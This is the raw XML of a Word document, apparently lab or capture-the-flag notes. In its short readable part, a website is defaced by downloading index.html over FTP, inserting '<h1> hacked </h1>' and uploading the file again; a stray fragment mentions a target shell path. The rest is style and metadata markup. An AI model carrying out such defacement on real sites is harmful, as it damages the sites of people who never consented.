    <w:p w14:paraId="4B83C80E" w14:textId="102BAF10" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>modify</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the index.html to do that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496406E9" w14:textId="0079467D" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t>Get index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D9AD64" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D"/>
    <w:p w14:paraId="753F34D9" w14:textId="18D8E952" w:rsidR="001B362D" w:rsidRPr="005C5723" w:rsidRDefault="001B362D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B362D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In new tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317B9C8A" w14:textId="334208C3" w:rsidR="001B362D" w:rsidRDefault="001B362D">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nono</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> edit the index.html:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19204472" w14:textId="27541043" w:rsidR="005C5723" w:rsidRDefault="005C5723">
      <w:r>
        <w:t>Edit the body of the index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C9BC1" w14:textId="719CCC3C" w:rsidR="005C5723" w:rsidRDefault="005C5723">
      <w:r>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07361DFB" w14:textId="7A98B1CB" w:rsidR="001B362D" w:rsidRDefault="005C5723">
      <w:r>
        <w:t>&lt;h1&gt; hacked &lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D0E663" w14:textId="77777777" w:rsidR="005C5723" w:rsidRDefault="005C5723"/>
    <w:p w14:paraId="67769D71" w14:textId="0798A0BD" w:rsidR="005C5723" w:rsidRPr="005C5723" w:rsidRDefault="005C5723">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5723">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In ftp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C6DC60" w14:textId="3F0B4D0A" w:rsidR="005C5723" w:rsidRDefault="005C5723">
      <w:r>
        <w:t>Put index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5935B54B" w14:textId="79154D09" w:rsidR="005C5723" w:rsidRDefault="005C5723">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEA73AF" w14:textId="77777777" w:rsidR="005C5723" w:rsidRDefault="005C5723"/>
    <w:p w14:paraId="338D2427" w14:textId="3E22497F" w:rsidR="005C5723" w:rsidRDefault="005C5723">
      <w:r>
        <w:t>Access the website in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E62C04" w14:textId="77777777" w:rsidR="005C5723" w:rsidRDefault="005C5723"/>
    <w:p w14:paraId="3FCF5639" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D"/>
    <w:p w14:paraId="4D287F51" w14:textId="77777777" w:rsidR="001B362D" w:rsidRDefault="001B362D"/>
    <w:p w14:paraId="1DBF557B" w14:textId="77777777" w:rsidR="009D63B7" w:rsidRDefault="009D63B7"/>
    <w:p w14:paraId="633669F2" w14:textId="77777777" w:rsidR="009D63B7" w:rsidRDefault="009D63B7"/>
    <w:p w14:paraId="557E5DF7" w14:textId="77777777" w:rsidR="009D63B7" w:rsidRDefault="009D63B7"/>
    <w:p w14:paraId="33AE4107" w14:textId="77777777" w:rsidR="009D63B7" w:rsidRDefault="009D63B7"/>
    <w:p w14:paraId="245C2887" w14:textId="77777777" w:rsidR="008F7E57" w:rsidRDefault="008F7E57"/>
    <w:p w14:paraId="20DA8061" w14:textId="77777777" w:rsidR="008F7E57" w:rsidRDefault="008F7E57"/>
    <w:sectPr w:rsidR="008F7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FA"/>
    <w:rsid w:val="00092142"/>
    <w:rsid w:val="001B362D"/>
    <w:rsid w:val="00324EEE"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005C5723"/>
    <w:rsid w:val="007F3A81"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008F7E57"/>
    <w:rsid w:val="009D63B7"/>
    <w:rsid w:val="00C31BB2"/>
    <w:rsid w:val="00C67030"/>
    <w:rsid w:val="00E8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6DE75"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1EE13EF1-D87C-4E7F-980D-88130FDB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FA"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00E80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FA"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00E805FA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00E805FA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00E805FA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00E80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5FA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00E805FA"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B362D"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B3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arget_ip/shel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356</Words>
  <Characters>2228</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>185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7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-18T08:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-19T05:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>